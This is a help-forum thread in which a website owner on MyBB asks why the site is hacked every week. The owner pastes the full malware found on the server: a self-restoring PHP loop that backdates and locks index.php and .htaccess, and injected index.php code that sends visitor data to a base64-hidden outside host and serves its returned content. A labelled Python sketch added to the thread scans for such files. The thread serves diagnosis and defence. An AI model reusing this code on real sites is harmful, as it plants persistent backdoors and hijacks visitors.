WebSite X5 Help Center

 
A. Pais
User

Hack website

Author: A. Pais
Visited 389, Followers 1, Shared 0

For about 4 months now, I have been hacked every week.
I have already tried deleting the whole folder and deleting the altered files, and every time I upload the clean files, after a few days the same thing happens.
I think there is a vulnerability in some file through which the hacker manages to access the space. Can you help if I send you the files for analysis?
I am frustrated and have already gone back to the old program (website x5 evo12), since it was always secure.
Can you help me?

Posted on
10 REPLIES
Claudio D.
Moderator
User of the month IT

What exactly do you mean by “hacked”?

The only vulnerabilities might be in the PHP files if you use a deprecated version of PHP, but the chances are very low.

I think that:
- either you have extra code from a dubious source (counters, for example),
- or they have your FTP password.

Anyway, version 12 is more vulnerable.

Have you changed the FTP password yet?
Do you have extra codes?
Do you use FTPS to transfer the site to the host?

Explain well what you mean by “hacked”.



Posted by Claudio D.
Alvin L.
User

Looks like you are using MyBB for your forums. You might see if they have an upgrade. Your hosting provider should offer the ability to block IPs. Most likely they are coming from a short list of IPs.

Posted by Alvin L.
A. Pais
User
Author

Yes, I use MyBB, but I think it is not there. Yesterday I deactivated the plugins, and it is the same. Every time I delete these 3 files, after some time they reappear, and my index is put with ".old", like in the screenshot. I can share the files; they don't have a virus, but someone can see what they mess with.

Posted by A. Pais
Claudio D.
Moderator
User of the month IT

Have you reset and changed the FTP password?

What version of MyBB?

What version of PHP?

Posted by Claudio D.
A. Pais
User
Author

I reset the FTP pass, like 5 times.

My version of MyBB is the last 1.38.

The PHP version I can see in cPanel is 7.3 (current).

Posted by A. Pais
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Posted by Alvin L.
A. Pais
User
Author

I will consider it in the next update of MyBB, but I think it is not from there.

This is the code that appears:

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in the new index.php

This is the change:

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("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"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? 
$_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Posted by A. Pais
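
An added detection sketch, not part of the original post and not code from WebSite X5 or MyBB: the l.php code in the post above backdates the files it restores by 400 days with touch(), so a search by modification time misses them. This Python scan flags files whose mtime is far older than their ctime, and PHP files that carry traits of the posted code; the 30-day threshold, the indicator names and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
import time

# Traits visible in the l.php / index.php code posted in this thread.
INDICATORS = {
    "backdated-touch": re.compile(rb"touch\s*\([^;]*strtotime\s*\(\s*[\"']-\d+\s+days"),
    "self-restoring-loop": re.compile(rb"while\s*\(\s*true\s*\)[\s\S]*file_put_contents"),
    "remote-payload-decode": re.compile(rb"gzuncompress\s*\(\s*base64_decode"),
}
MAX_SKEW = 30 * 86400  # assumed threshold: mtime over 30 days older than ctime

def scan(webroot, max_skew=MAX_SKEW):
    """Return {relative_path: [reasons]} for suspicious files under webroot."""
    findings = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            reasons = []
            # touch() backdates mtime, but ctime still records the real change time.
            if st.st_ctime - st.st_mtime > max_skew:
                reasons.append("mtime-backdated")
            if name.endswith((".php", ".htaccess")):
                with open(path, "rb") as fh:
                    body = fh.read(1_000_000)
                reasons += [k for k, rx in INDICATORS.items() if rx.search(body)]
            if reasons:
                findings[os.path.relpath(path, webroot)] = sorted(reasons)
    return findings

def demo():
    """Scan a constructed web root (sample files written here, not real ones)."""
    root = tempfile.mkdtemp()
    samples = {
        "clean.php": b"<?php echo 'hello';",
        "l.php": b'<?php while (true) { @file_put_contents($p, $c); @touch($p, strtotime("-400 days")); }',
        "index.php": b"<?php $c = @gzuncompress(base64_decode($c)); ?><!DOCTYPE html>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    old = time.time() - 400 * 86400
    os.utime(os.path.join(root, "index.php"), (old, old))  # mimic the backdating
    return scan(root)

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the site's document root to `scan()`; a hit on `mtime-backdated` alone is only a lead, since restoring a backup or unpacking an archive also produces old mtimes with fresh ctimes.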
A. Pais
User
Author

OK, I think I figured out the problem.
I did a search in the file I.php and got some results relating to Facebook. I have a code and plugin in my index, so I removed them. Let's see if they appear again. Hope not ;)

Posted by A. Pais
Glaucio M.
User

Friend, the problem is on your server. If it is a single account, the FTP may have been broken into and some malicious code planted. Most of the time it gets broken into because it is shared hosting! Hold the company responsible for your hosting to account!

Posted by Glaucio M.
A. Pais
User
Author

The problem is not the Facebook plugin. I will try to make a fresh MyBB install and see if the problem remains.

I will give news.

Posted by A. Pais